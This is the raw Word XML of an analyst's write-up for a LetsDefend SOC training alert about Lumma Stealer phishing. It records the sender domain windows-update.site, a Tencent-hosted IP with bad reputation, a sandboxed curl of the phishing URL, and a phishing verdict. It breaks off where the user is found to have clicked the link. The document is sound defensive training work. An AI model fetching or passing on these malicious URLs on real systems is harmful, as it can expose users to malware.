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5FE3" w14:textId="69880155" w:rsidR="00464925" w:rsidRDefault="005B048D">
      <w:r>
        <w:t>Case Investigation Order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFEAA98" w14:textId="4C0D09E3" w:rsidR="005B048D" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Understand why alert was triggered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E41AA01" w14:textId="22E2E0A5" w:rsidR="005B048D" w:rsidRPr="00BD045C" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Examine rule name</w:t>
      </w:r>
      <w:r w:rsidR="00BA6292">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00BA6292" w:rsidRPr="00BA6292">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SOC338 - Lumma Stealer - DLL Side-Loading via Click Fix Phishing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1930B917" w14:textId="59037F6D" w:rsidR="00BD045C" w:rsidRDefault="00BD045C" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD045C">
        <w:t>Time/Date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BD045C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mar 13, 2025, 09:44 AM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD3AF9C" w14:textId="2D2F699D" w:rsidR="00ED3986" w:rsidRPr="00ED3986" w:rsidRDefault="005B048D" w:rsidP="00ED3986">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Detect which two devices the traffic is occurring</w:t>
      </w:r>
      <w:r w:rsidR="00ED3986">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00ED3986" w:rsidRPr="00ED3986">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SMTP Address :</w:t>
      </w:r>
      <w:r w:rsidR="00ED3986" w:rsidRPr="00ED3986">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED3986" w:rsidRPr="00ED3986">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>132.232.40.201</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA09F87" w14:textId="337867B5" w:rsidR="00ED3986" w:rsidRPr="00ED3986" w:rsidRDefault="00ED3986" w:rsidP="00ED3986">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED3986">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Source Address :</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED3986">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED3986">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>update@windows-update.site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69580B0C" w14:textId="0F5B0FC3" w:rsidR="005B048D" w:rsidRPr="00ED3986" w:rsidRDefault="00ED3986" w:rsidP="00ED3986">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED3986">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Destination Address :</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED3986">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED3986">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dylan@letsdefend.io</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476F09A4" w14:textId="469BA5E6" w:rsidR="005B048D" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Collect Data</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A9A3CC" w14:textId="3B6F4EA9" w:rsidR="005B048D" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ownership of the IP addresses and devices.</w:t>
      </w:r>
      <w:r w:rsidR="00AB2D0B">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00F46CD4" w:rsidRPr="00F906FE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">External server: </w:t>
      </w:r>
      <w:r w:rsidR="00F46CD4" w:rsidRPr="00F906FE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>132.232.40.201</w:t>
      </w:r>
      <w:r w:rsidR="001A5838">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Destination server: </w:t>
      </w:r>
      <w:r w:rsidR="001A5838" w:rsidRPr="001A5838">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>172.16.20.3</w:t>
      </w:r>
      <w:r w:rsidR="001A5838">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (Exchange)</w:t>
      </w:r>
      <w:r w:rsidR="00F46CD4" w:rsidRPr="00F906FE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00F906FE" w:rsidRPr="00F906FE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Dylan’s machine: 172.16.17.216</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FD88B9" w14:textId="08FA7EF7" w:rsidR="005B048D" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>If the traffic is coming from outside (Internet);</w:t>
      </w:r>
      <w:r w:rsidR="00F46CD4">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00F906FE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Y</w:t>
      </w:r>
      <w:r w:rsidR="00F46CD4" w:rsidRPr="00F46CD4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>es</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40730337" w14:textId="3F432448" w:rsidR="005B048D" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ownership of IP address (Static or Pool Address? Who owns it? Is it web hosting?)</w:t>
      </w:r>
      <w:r w:rsidR="00397436">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00397436" w:rsidRPr="00746913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ASN:  </w:t>
      </w:r>
      <w:r w:rsidR="00746913" w:rsidRPr="00746913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AS45090</w:t>
      </w:r>
      <w:r w:rsidR="00746913" w:rsidRPr="00746913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00746913" w:rsidRPr="00746913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Name</w:t>
      </w:r>
      <w:r w:rsidR="00746913" w:rsidRPr="00746913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00746913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00746913" w:rsidRPr="00746913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TENCENT-NET-AP Shenzhen Tencent Computer Systems Company Limited</w:t>
      </w:r>
      <w:r w:rsidR="004E22E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="004E22E1" w:rsidRPr="004E22E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Domain Name</w:t>
      </w:r>
      <w:r w:rsidR="004E22E1" w:rsidRPr="004E22E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">:  </w:t>
      </w:r>
      <w:r w:rsidR="004E22E1" w:rsidRPr="004E22E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tencentcloud.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174F1EF0" w14:textId="5E33B4F0" w:rsidR="005B048D" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Reputation of IP Address (Search in </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="00C4041C" w:rsidRPr="00E06996">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>VirusTotal</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C4041C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="00C4041C" w:rsidRPr="00FD539B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>AbuseIPDB</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C4041C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="00C4041C" w:rsidRPr="00E06996">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Cisco Talos</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3E8D8B" w14:textId="67257CDD" w:rsidR="00746913" w:rsidRPr="00953119" w:rsidRDefault="00746913" w:rsidP="00746913">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00953119">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Multiple reports of malicious traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51629B61" w14:textId="77777777" w:rsidR="005B048D" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>If the traffic is coming from company network;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEFA8EF" w14:textId="77777777" w:rsidR="005B048D" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Hostname of the device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B30CAB7" w14:textId="77EACC9C" w:rsidR="005B048D" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Who owns the device (username)</w:t>
      </w:r>
      <w:r w:rsidR="004334B5">
        <w:br/>
      </w:r>
      <w:r w:rsidR="004334B5" w:rsidRPr="004C4EBD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Dylan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DDABEA" w14:textId="689EAF3C" w:rsidR="005B048D" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Last user logon time</w:t>
      </w:r>
      <w:r w:rsidR="004334B5">
        <w:br/>
      </w:r>
      <w:r w:rsidR="004C4EBD" w:rsidRPr="004C4EBD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mar 14, 2025 12:05PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77071AF6" w14:textId="0E9F4CF7" w:rsidR="005B048D" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Examine HTTP Traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3567CA6E" w14:textId="64726FA0" w:rsidR="005B048D" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Check the traffic content for any suspicious conditions such as web attack payloads (SQL Injection, XSS, Command Injection, IDOR, RFI/LFI).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111A274A" w14:textId="6A51D839" w:rsidR="005B048D" w:rsidRPr="00D9473A" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Examine all the fields in the HTTP Request. Since the attackers do not only attack through the URL, all the data from the source must be examined to understand whether there is really a cyber attack.</w:t>
      </w:r>
      <w:r w:rsidR="00D31C41">
        <w:br/>
      </w:r>
      <w:r w:rsidR="008013F4" w:rsidRPr="00D9473A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Investigated email which is from a </w:t>
      </w:r>
      <w:r w:rsidR="00F82F5F" w:rsidRPr="00D9473A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>suspicious domain/address (update@windows-update.site).  Update Now button point to site (</w:t>
      </w:r>
      <w:r w:rsidR="00F62F2C" w:rsidRPr="00D9473A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>https://www.windows-update.site/</w:t>
      </w:r>
      <w:r w:rsidR="00F82F5F" w:rsidRPr="00D9473A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00F62F2C" w:rsidRPr="00D9473A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidR="00F04C3C" w:rsidRPr="00D9473A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Performing “curl </w:t>
      </w:r>
      <w:r w:rsidR="00573E62" w:rsidRPr="00D9473A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>https://www.windows-update.site/</w:t>
      </w:r>
      <w:r w:rsidR="00D9473A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00573E62" w:rsidRPr="00D9473A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> in linux sandbox yields no result as hostname cannot be resolved.  Link appears to be broken.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0C4C71" w14:textId="5990D85F" w:rsidR="005B048D" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You can review the </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="005B048D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Web Attacks 101</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> tutorial for information about attacks on web applications and how to detect these attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160526F8" w14:textId="7D4853BB" w:rsidR="005B048D" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005B048D">
        <w:t>Is Traffic Malicious?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FB9D4E" w14:textId="158FD428" w:rsidR="005B048D" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005B048D">
        <w:t>Decide whether the traffic is malicious or not based on your investigations.</w:t>
      </w:r>
      <w:r w:rsidR="00D9473A">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D9473A" w:rsidRPr="00D9473A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Appears to be malicious, yes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37194360" w14:textId="29A893D6" w:rsidR="005B048D" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005B048D">
        <w:t>Which of the following is the attack vector in the malicious traffic you have detected as a result of your investigations?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79677042" w14:textId="6EAE43C2" w:rsidR="005B048D" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4012303D" w14:textId="4E230E27" w:rsidR="005B048D" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>IDOR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653C5998" w14:textId="6E8CA543" w:rsidR="005B048D" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>LFI &amp; RFI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1B622E" w14:textId="600196F3" w:rsidR="005B048D" w:rsidRPr="004E4106" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E4106">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Other</w:t>
      </w:r>
      <w:r w:rsidR="004E4106">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (Phishing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23166B1E" w14:textId="33357B51" w:rsidR="005B048D" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5A6051" w14:textId="5E0D6635" w:rsidR="005B048D" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>XML Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600BCE73" w14:textId="6AA268A1" w:rsidR="005B048D" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E880FD3" w14:textId="05B0E8A7" w:rsidR="005B048D" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005B048D">
        <w:t>Check If It Is a Planned Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262B30D9" w14:textId="7839EE3F" w:rsidR="005B048D" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Penetration tests or attack simulation products can trigger False Positive alarms if the rules are not set correctly. Check whether the malicious traffic is the result of a planned test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FDBC76" w14:textId="77777777" w:rsidR="005B048D" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Check if there is an email showing that there will be planned work by searching for information such as hostname, username, IP address on the mailbox.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E33ED95" w14:textId="77777777" w:rsidR="005B048D" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Check if the device generating malicious traffic belongs to attack simulation products. If the Hostname contains the name of Attack Simulation products (such as Verodin, AttackIQ, Picus…), these devices belong to Attack Simulation products within the framework of LetsDefend simulation and it is a planned work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF8E97A" w14:textId="59250724" w:rsidR="005B048D" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Is the malicious traffic caused by a planned test?</w:t>
      </w:r>
      <w:r w:rsidR="00BB5EE3">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00BB5EE3" w:rsidRPr="0007647A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Not likely.  No emails mentioned phishing </w:t>
      </w:r>
      <w:r w:rsidR="0007647A" w:rsidRPr="0007647A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AB4C13" w14:textId="57F7236C" w:rsidR="005B048D" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>What is the Direction of Traffic?</w:t>
      </w:r>
      <w:r w:rsidR="0007647A">
        <w:br/>
      </w:r>
      <w:r w:rsidR="0007647A" w:rsidRPr="0007647A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Internet to Internal Exchange server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B0A0E4" w14:textId="78A803F7" w:rsidR="005B048D" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005B048D">
        <w:t>Check Whether the Attack Was Successful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230B4B8A" w14:textId="0D28B43A" w:rsidR="005B048D" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Investigate whether the attack was successful. Detection mechanisms vary according to the attack type. Some tips that can help with your investigation;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035DA64F" w14:textId="77777777" w:rsidR="005B048D" w:rsidRDefault="005B048D" w:rsidP="005B048D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>In Command Injection attacks, you can understand whether the attack was successful by looking at the "Command History" of the relevant device via Endpoint Security. In SQL Injection attacks, attackers can run commands on the device with the help of functions such as "xp_cmdshell". For this reason, you may need to look at the "Command History" in SQL Injection attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEA5CC4" w14:textId="77777777" w:rsidR="006C078A" w:rsidRPr="0077717E" w:rsidRDefault="005B048D" w:rsidP="006C078A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>You can guess by looking at the HTTP Response size in SQL Injection and IDOR attacks.</w:t>
      </w:r>
      <w:r w:rsidR="001D219A">
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D219A" w:rsidRPr="007B7941">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Checking Dylan’s machine, he did indeed click the </w:t>
      </w:r>
      <w:r w:rsidR="004866BF" w:rsidRPr="007B7941">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>seemingly malicious link</w:t>
      </w:r>
      <w:r w:rsidR="00926BC4">
        <w:rPr>
